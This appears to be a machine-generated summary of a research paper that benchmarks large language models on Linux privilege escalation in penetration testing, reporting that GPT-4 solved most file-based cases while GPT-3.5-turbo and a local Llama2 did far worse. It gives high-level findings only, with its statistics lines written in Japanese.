Core Concepts
Large Language Models (LLMs) are being explored for their capabilities and challenges in the context of privilege escalation in penetration testing.
Abstract
ABSTRACT:
Penetration testing is crucial for identifying vulnerabilities in systems.
Language Models (LLMs) are used to automate tasks in pen-testing.
A benchmark was created to evaluate LLMs' performance in Linux privilege escalation.
INTRODUCTION:
Linux privilege escalation involves gaining elevated access to resources.
LLMs show potential for automating and enhancing pen-testing tasks.
METHODOLOGY:
Design Science approach used to create a benchmark for Linux privilege escalation.
Vulnerability classes based on common exploits identified from CTF challenges.
RESULTS:
GPT-4 excelled at detecting file-based exploits, while GPT-3.5-turbo struggled.
Locally-run LLMs had limited success compared to cloud-based models.
EVALUATION:
High-level guidance improved exploitation rates significantly.
Context size impacted model performance, with larger sizes benefiting certain models.
DISCUSSION:
Quality of generated commands varied among LLMs, with some struggling with syntax and logic.
Multi-step exploits posed challenges for LLMs, highlighting the importance of causal connections.
Stats
GPT-4はファイルベースの脆弱性を検出するのに適しており、75〜100%のテストケースを解決できることが示されました。
GPT-3.5-turboは25〜50%しか解決できず、ローカルモデルであるLlama2はいかなる脆弱性も検出できませんでした。